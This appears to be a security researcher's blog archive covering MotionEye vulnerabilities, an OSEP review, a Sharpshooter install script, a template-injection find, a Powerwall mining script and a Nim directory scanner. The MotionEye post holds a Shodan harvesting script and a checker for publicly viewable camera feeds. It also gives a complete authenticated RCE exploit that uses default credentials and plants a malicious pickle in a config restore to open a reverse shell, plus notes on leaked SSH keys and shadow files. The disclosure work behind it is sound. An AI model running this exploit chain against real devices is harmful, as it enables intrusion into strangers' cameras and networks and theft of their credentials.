MotionEye Config Info Disclosure

Edit: This was given CVE-2022-25568. As mentioned in my previous posts here and here, I’ve done a little digging into the conditions that are required for the MotioneEye config file to be world viewable, and I’ve reached this conclusion:

As long as a “user” password is not set, the config file will be world readable. Even if an “admin” password has been set, the /config/list file will still be readable by everybody. So, while someone could think they are doing the correct thing by creating a password for the admin user, they may still be leaking private information. Here is a innocuous example from a live instance:

As you can see in this picture, IP addresses/services/passwords are exposed. This is a rather innocuous example, being that it is an internal IP address, but it illustrates how this could be an issue. Imagine if those were your public FTP server credentials. Or if they were your gmail credentials for smtp notifications. The list goes on.

Along with usernames, passwords, auth keys, and email addresses, these config files also contain less sensitive information like internal network IP addresses and URLs, drive and mounting information.

In many ways this vulnerability may be worse that the MotionEye RCE vulnerability that I reported and received a CVE for. In that case, the admin password needed to be left blank (or easily guessed) for someone to get into the admin panel and achieve RCE. In this case, a user could think they’re being secure by setting an admin password, but they leave the user password blank – and the config remains viewable.

I’ve found gmail, gdrive, ftp, sftp, telegram stuff (not sure how auth works there), etc. all exposed to the WWW in these files.

I’ve submitted an issue on the MotionEye github page, but if it is anything like last time, they don’t plan on fixing it/see it as a non-issue.

Edit: The issue was closed before I even finished this post.

Edit: The issue was reopened and I submitted a pull request to fix the issue, although my fix was not tested much, so it may not work properly.

Offensive Security PEN-300 Evasion Techniques and Breaching Defenses – Course and Exam Review

You know, OffSec describes the OSEP as: “Evasion Techniques and Breaching Defenses (PEN-300) is an advanced penetration testing course”. I don’t know how advanced it is, if I can pass, lol. I generally have no idea what I’m doing.

Anyway, I really liked the course. There is a lot of material to keep you busy. Unless you’re already familiar with a large chunk of the topics, you’re probably best-served by purchasing the 90 day version of the course. The challenge labs are fun. Make sure you do them before the exam.

The exam was challenging, but fair. You should be able to figure out what you need to do next somewhat quickly, but executing it may be a different story, if you’re anything like me. Just ask yourself, “What did I just accomplish, and what does that allow me to do now?” If you’ve completed the challenge labs, you will be well-prepared for the exam. Some people say to make sure you do all the questions and extra miles in the lab manual, but I only did, I don’t know, 30% of them?

I don’t know what’s next for me. I have a voucher to do the OSED, but I’m a little burned out at this point. I’ll probably put that off until the summer – because who doesn’t like sitting inside and writing exploits when the weather is nice?

Update: Hacking MotionEye – CVE-2021-44255

I was given CVE-2021-44255 for this – authenticated RCE via a malicious tasks (python pickle) file. So that’s fun. Even though it is authenticated, the default username is admin and the default password is blank, so you know how these things go. I actually haven’t heard of any MotionEye instances being used in botnets or anything.

I should probably request a CVE for the unauthenticated information disclosure that I found, but I need to do some more research on that one.

Sharpshooter, Python2.7, and Pip2 Installation

Newer versions of Linux may not come with any sort of Python 2 installed. I recently wanted to run Sharpshooter, which is a “payload creation framework for the retrieval and execution of arbitrary CSharp source code.”

Problem is, Python 2 isn’t installed by default on Ubuntu 21.xx and neither is pip2. You also need to install an older (I think) version of jsmin – at least that’s what worked for me.

Use this script to install everything and get it up and running.

if [ "$EUID" -ne 0 ]
    then echo "Run as root!"

# clone sharpshooter from github
git clone

add-apt-repository universe && apt update

apt install git curl

# install python2.7 and pip2
apt install python2.7 -y
curl --output
chmod +x ./
sudo python2.7 ./

# install correct jsmin
tar xzf jsmin-2.2.2.tar.gz
python2.7 ./jsmin-2.2.2/ install

Client Side Template Injection, huh?

I ran into this maybe two years ago and I didn’t even know it was a thing. I was actually trying to order some food (🍕) online and I noticed I could see the braces of a template being used.

I’m not sure there is a term for the braces being briefly exposed while a page is loading, but I’ve recently found out that VueJS has something to prevent this. I’m not too up to date with Vue, or Angular (in my case), so I’m a little out of my element.

Anyway, I saw the braces so I immediately tried some template injecting. It was odd to me because the page was IIS/aspx/dotnet, which usually isn’t a bastion of SSTI. And in my SSTI tests, Javascript functions like toUpperCase() were working, but other payloads that I thought may work did not work. At this point I was confused.

I eventually stumbled upon Client Side Template Injection. I kept messing around and finally was able to achieve XSS with the payload


as seen here.

I notified the website management, and they did institute a fix. You can see the they only accepting valid alphanumeric characters at this point. Oddly, this fix works on some of their sites and on some of them it doesn’t. I don’t know what’s going on there.

See the following links for more information from people that know more than I do — Portswigger, HackTricks.

Do More with Tree (and why you should read the docs)

If you aren’t familiar with the Tree command in Linux, you should be. You can read about it here. Tree has been around for what seems like forever, and I’ve been using it for as long as I’ve been using Linux. With that said, I didn’t really know all that much about it until recently. The extent of my usage has always been something like this: $ tree -L 3 and that’s it.

Like most other Linux tools, there is much more to Tree than what I know. Take a look at the following command:

$ tree -LpDugC 2 -H .  > index.html 

This will create an index.html file that has a listing of everything in the dir in HTML form.

Anyway, you can install tree on Linux, Mac, and even Windows. There really wasn’t a huge point to this post — it’s just a reminder that your tools can do a lot more than what you’re probably already using them for. It pays to read the documentation.

Learning Go By Writing a POC for Gitlab CVE-2021-22205

I’ve been wanting to learn Go, and I learn by doing, so I decided to write a POC for CVE-2021-22205, which is fairly straightforward RCE in Gitlab that dropped a few weeks ago. My process in developing this went like this.

  1. Do thirty seconds of research to find a prior Golang POC for this CVE. I didn’t find one, but I’m sure they exist somewhere. I still would have written this, even if I found one. It would make for something to compare my poorly written code to.
  2. Start writing code. My thoughts the whole time while I was writing this were some variation of the following, “There must be a better way to do this.”
  3. Test.
  4. Rewrite.
  5. Repeat above for about 6 hours.
  6. Success!

I’m going to need more practice. I’ve been so used to python for the last ten years, moving to Golang is going to take some work.

Anyway, here is a link to my POC.

Tesla Solar, Powerwalls, Docker, Python, and Crypto Mining

I had Tesla solar panels and Powerwalls installed several weeks ago. I currently don’t have permission to operate (PTO) from my electricity provider, which means I can’t ship any of my surplus power back to the grid. So, after my batteries fill up for the day, I usually have power production that is going to waste. What can I do with that power?

Mine crypto, that’s what I can do! Those of you that know me IRL, know that I’ve been involved in crypto for a decade. Mining isn’t new to me, but I mostly gave up on it in 2012/2013 when I was only mining a few of Bitcoin a month and it wasn’t worth it to me anymore. Talk about a wrong decision…

I digress. I’m sitting here now producing extra power. Mining crypto with a graphics card that I already have will make me around $50-100/month and give me a chance to whip up a script in Python, which is what I truly enjoy in life. I haven’t done the actual math on it, but I think mining crypto is more profitable that selling my power back to my utility provider. It is also more fun to mine, lol.

My workstation that I’ll be mining on has a sole Gigabyte 1080 TI. It’s a little old, but they’re still going for $700 on eBay these days. I’m running Ubuntu 20.04, and I’ve decided to mine with a docker container and pointing my card at an ethash endpoint from NiceHash. I need to do some research to see if there are better options – which I assume exist.

My overall strategy for this operation will be pretty simple to start off. I’m just going to mine when my batteries are charged above a certain threshold. I set this threshold in the variable BATTERY_CHARGE_TO_START_MINING in the code. Yeah, I like long variable names.

Fortunately, Tesla provides an API to gather information from the Powerwall and there is a Python package to query it. To install this package use the following command:

pip3 install tesla_powerwall

And since I use this docker image to run the Trex Miner app, we also need to install the docker python package.

pip3 install docker

This script is pretty straightforward. I start a docker client to get the running images. I create a new Miner class with my wallet address and URL. This class has methods to start and stop the miner, as well as check if it is running.

Then, in a while loop I check my battery level and start and stop the miner as appropriate. I repeat this every HOW_OFTEN_TO_CHECK seconds.

Here is the code:

#!/usr/bin/env python3

import os
from tesla_powerwall import Powerwall
import docker
import time

POWERWALL_URL = ""  # PowerWall Gateway address goes here
EMAIL = ""  # email address that you use to login into the gateway
PASSWD = ""  # password that you use to log into the gateway
WALLET_ADDRESS = "35kwhvhyfnVnGdoWdyLqrtaHeY7RYByPfW"  # mining wallet address
    "stratum+tcp://"  # Mining url
# lowest battery charge where mining will start
# how often to check is battery level allows mining or not in seconds

def init():
    # initialize powerwall object and api
    powerwall = Powerwall(
    powerwall.login(PASSWD, EMAIL)

    api = powerwall.get_api()

    return powerwall, api

class Miner:
    def __init__(self, client, wallet_address, mining_url):

        self.wallet_address = wallet_address
        self.mining_url = mining_url
        self.client = client

    def start_miner(self, client):
        env_vars = {
            "SERVER": MINING_URL,
            "WORKER": "Rig",
            "ALGO": "ethash",
                ports={4067: 4067},
        except os.error as e:

    def stop_miner(self, client):
        trex = client.containers.get("trex-miner")

    def is_running(self):
            return True
        except os.error:
            return False

if __name__ == "__main__":
    powerwall, api = init()

    client = docker.from_env()

    miner = Miner(client, WALLET_ADDRESS, MINING_URL)


    while True:
        # powerwall charge is satisfactory, start mining
        if not miner.is_running() and (
            print("miner is running or will be started")
        # powerwall charge is too low, shut off mining
        elif miner.is_running() and (
            print("stopping miner")
        # try again

You can also find future updates of the code here.

TODO: add more options to start/stop mining e.g. if my panels/batteries are connected to the grid or not, start/stop mining based on the weather, etc.

TODO: rewrite in Golang. Trying to learn Go.

Hacking MotionEye/MotionEyeOS

Getting Started with MotionEye

MotionEye is an open source, web-based GUI for the popular Motion CLI application found on Linux. I’ve known of the Motion command line app for years, but I didn’t know that MotionEye existed. I ran across it while trying to find a multiple webcam, GUI or web based solution for future projects.

MotionEye comes in a couple forms – a standalone app, which I used the docker container version of, or a “whole” operating system, MotionEyeOS, to install on a Raspberry Pi.

Starting off, I used Shodan search to find internet facing installations. Here is the script I used for that. If you use this script, you’ll need to put in your API key and the limit parameter, which limits the API queries that you use.

#!/usr/bin/env python3

import sys
# pip3 install shodan
from shodan import Shodan
import requests

# check for api key
api = Shodan('') # Insert API key here

if api.api_key == '':
    print("No API key found! Exiting")

limit = 1000 # set this to limit your api query usage
counter = 0

url_file = open("urls.txt", "w")

for response in api.search_cursor('Server: motionEye'):
    ip = response['ip_str']
    port = response['port']
    url = f'http://{ip}:{port}'
    url_file.write(url + '\n')

    # Keep track of how many results have been downloaded so we don't use up all our query credits
    counter += 1
    if counter >= limit:


I ran out of query credits when I ran this script. There are thousands of installations out there. This script will output the IP addresses of those installations.

Finding Live Feeds

In my review of the application, I found that you can make a query to the /picture/{camera-number}/current/ endpoint, and if it returns a 200 status code, it means that the feed is open to the public. You can also increment the camera-number an enumerate the numbers of cameras a feed will actually have, even if it isn’t available to view.

I took the output of script above, and fed it to script below.

#!/usr/bin/env python3

import requests

url_file = open("urls.txt", "r")
urls = url_file.readlines()

live_urls = open("live-urls.txt", "w")

for url in urls:
        response = requests.get(url + "/picture/0/current/", verify=False, timeout=3).status_code
        if response == 200:


This script outputs the URL of camera feeds that we can view. But the real question here is, what security issues are there with MotionEye?

Information Leakage

It turns out that if you make a get request to the following endpoint /config/list, some of the feeds will return their config files. Most of the time these config files are innocuous. I’m not sure why these are publicly accessible even if the feed is publicly accessible. Maybe it is used as an API endpoint of some sort. I need to dig into the code some more.

However, sometimes these config files contain some very sensitive information. Consider the following config with email_notifications_smtp_password and email_notifications_addresses removed. These passwords are supposed to be for services that the public cannot access, but unfortunately people like to reuse passwords. Again, why is this file even readable?

Along with the occasional password, email addresses are in here, internal IP addresses and ports, mounting points for local drives, etc.

Rate-Limiting and Default Credentials

So, the default installation of MotionEye uses the username of admin and a blank password. Additionally, MotionEye does not seem to institute any sort of rate limiting on login attempts. This is a recipe for disaster.

Authenticated RCE Method #1

Once logged in, I found two simple methods of code execution. The first of which is a classic Python cPickle deserialization exploit.

In the configuration section of the application, there is an option to backup and restore the application configurations. It turns out that if you include a malicious tasks.pickle file in the config you are restoring with, it’ll be written to disk and will be loaded when the application is restarted automatically or manually.

You can simply download the current configuration to use it as a template. After downloading and extracting it, slide your malicious tasks.pickle file and tar.gz everything back up.

The final structure of my motioneye-config.tar.gz for the docker container is as follows:

├── camera-1.conf
├── motion.conf
├── motioneye.conf
└── tasks.pickle

Alternatively, the final structure of my motioneye-config.tar.gz lon MotionEyeOS is the following:

├── adjtime
├── camera-1.conf
├── crontabs
├── date.conf
├── localtime -> /usr/share/zoneinfo/UTC
├── motion.conf
├── motioneye.conf
├── ntp.conf
├── os.conf
├── proftpd.conf
├── shadow
├── shadow-
├── smb.conf
├── ssh
│   ├── ssh_host_dsa_key
│   ├──
│   ├── ssh_host_ecdsa_key
│   ├──
│   ├── ssh_host_ed25519_key
│   ├──
│   ├── ssh_host_rsa_key
│   └──
├── static_ip.conf
├── tasks.pickle
├── version
├── watch.conf
└── wpa_supplicant.conf

Pause here: You see, those are ssh keys. So you say why don’t we just try ssh? Go for it. You also may not even need a password, but some people have either secured ssh or disabled ssh on the actually raspberry pi, so it won’t work. A lot of these instances will have ssh turned off, and if it is running in docker, you probably won’t be able to download the ssh keys. Also, it is more fun to write scripts in Python.

Once the configuration is uploaded, wait for the app to reload, or, in unfortunate cases, wait for the app to be reloaded by mother nature or the victim. From what I can see, the docker application will not autoreboot. Here is a Python 3 script that will do all of this. Also, see the github repo, which may be more updated.

#!/usr/bin/env python3

import requests
import argparse
import os
import pickle
import hashlib
import tarfile
import time
import string
import random
from requests_toolbelt import MultipartEncoder
import json

# proxies = {"http": "", "https": ""}
proxies = {}

def get_cli_args():
    parser = argparse.ArgumentParser(description="MotionEye Authenticated RCE Exploit")
        help="Victim url in format ip:port, or just ip if port 80",
    parser.add_argument("--attacker", help="ipaddress:port of attacker", required=True)
        "--username", help="username of web interface, default=admin", default="admin"
        "--password", help="password of web interface, default=blank", default=""
    args = parser.parse_args()
    return args

def login(username, password, victim_url):
    session = requests.Session()
    useragent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36"
    headers = {"User-Agent": useragent}
    login_url = f"http://{victim_url}/login/"
    body = f"username={username}&password={password}", headers=headers, data=body)
    return session

def download_config(username, victim_url, session):
    download_url = f"http://{victim_url}/config/backup/?_username={username}&_signature=5907c8158417212fbef26936d3e5d8a04178b46f"
    backup_file = session.get(download_url)
    open("motioneye-config.tar.gz", "wb").write(backup_file.content)

def create_pickle(ip_address, port):
    shellcode = ""  # put your shellcode here

    class EvilPickle(object):
        def __reduce__(self):
            cmd = shellcode
            return os.system, (cmd,)

    # need protocol=2 and fix_imports=True for python2 compatibility
    pickle_data = pickle.dumps(EvilPickle(), protocol=2, fix_imports=True)
    with open("tasks.pickle", "wb") as file:

def decompress_add_file_recompress():
    with"./motioneye-config.tar.gz") as original_backup:
    # move malicious tasks.pickle into the extracted directory and then tar and gz it back up
    os.rename("./tasks.pickle", "./motioneye-config/tasks.pickle")
    with"./motioneye-config.tar.gz", "w:gz") as config_tar:
        config_tar.add("./motioneye-config/", arcname=".")

def restore_config(username, password, victim_url, session):
    # a lot of this is not necessary, but makes for good tradecraft
    # recreated 'normal' requests as closely as I could
    t = int(time.time() * 1000)
    path = f"/config/restore/?_={t}&_username={username}"
    # admin_hash is the sha1 hash of the admin's password, which is '' in the default case
    admin_hash = hashlib.sha1(password.encode("utf-8")).hexdigest().lower()
    signature = (
    restore_url = f"http://{victim_url}/config/restore/?_={t}&_username=admin&_signature={signature}"

    # motioneye checks for "---" as a form boundary. Python Requests only prepends "--"
    # so we have to manually create this
    files = {
        "files": (
            open("motioneye-config.tar.gz", "rb"),

    useragent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.85 Safari/537.36"
    boundary = "----WebKitFormBoundary" + "".join(
        random.sample(string.ascii_letters + string.digits, 16)

    m = MultipartEncoder(fields=files, boundary=boundary)
    headers = {
        "Content-Type": m.content_type,
        "User-Agent": useragent,
        "X-Requested-With": "XMLHttpRequest",
        "Cookie": "meye_username=_; monitor_info_1=; motion_detected_1=false; capture_fps_1=5.6",
        "Origin": f"http://{victim_url}",
        "Referer": f"http://{victim_url}",
        "Accept-Language": "en-US,en;q=0.9",
    response =, data=m, headers=headers, proxies=proxies)
    # if response == reboot false then we need reboot routine
    content = json.loads(response.content.decode("utf-8"))

    if content["reboot"] == True:
        print("Rebooting! Stand by for shell!")
        print("Manual reboot needed!")

if __name__ == "__main__":
    print("Running exploit!")
    arguments = get_cli_args()
    session = login(arguments.username, arguments.password, arguments.victim)
    download_config(arguments.username, arguments.victim, session)
    # sends attacker ip and port as arguments to create the pickle
    create_pickle(arguments.attacker.split(":")[0], arguments.attacker.split(":")[1])
    restore_config(arguments.username, arguments.password, arguments.victim, session)

Authenticated RCE Method #2

Another method of code execution involves motion detection. There is an option to run a system command whenever motion is detected. The security implications of this are obvious.

python rev shell


While authentication is needed for RCE, the presence of default credentials and lack of rate limiting make obtaining authentication straightforward. There are a lot of people running this software in a vulnerable manner.

As per my usual advice, don’t expose MotionEye to the WWW. Like all the self-hosted solutions, I advise you to install this to face your internal network and then connect to your internal network via OpenVPN or Wireguard.

Update: I was give CVE-2021-44255 for the python pickle exploit.

I’ve Never Heard of Nim

IDK where I have been, but I never heard of this language until today. So, what’s the first thing you do when you learn about a language? You write a directory enumeration script with it.

Please disregard my horrible code, inability to follow Nim standards and philosophies, and the general hackiness of this code.

import httpclient
import parseopt
import strutils
import system
var p = initOptParser()
var wordlist: string
var url: string

while true:
  case p.kind
  of cmdEnd: break
  of cmdShortOption, cmdLongOption:
    if p.key == "u":
      url = p.val
    if p.key == "w":
      wordlist = p.val
  of cmdArgument:
    echo ""

let contents = readFile(wordlist)
let words = contents.splitLines()

var final_url: string
var client = newHttpClient(timeout = 100)

for i in 0 ..< words.len:
    final_url = url & "/" & words[i]
        let response = client.request(final_url, httpMethod = HttpGet)
        let status_code = response.status.split(' ')[0]
        if status_code == "200":
            echo final_url
        echo ""

All this code does is take a url parameter and a wordlist parameter and makes http get requests to the url + wordlist entry – standard directory enumeration stuff. If the response code is 200, that url gets sent to stdout.

As time permits I’ll update this app. It’d be cool to have it much more feature complete like gobuster, wfuzz, et. al. For now, see the github respository for more information.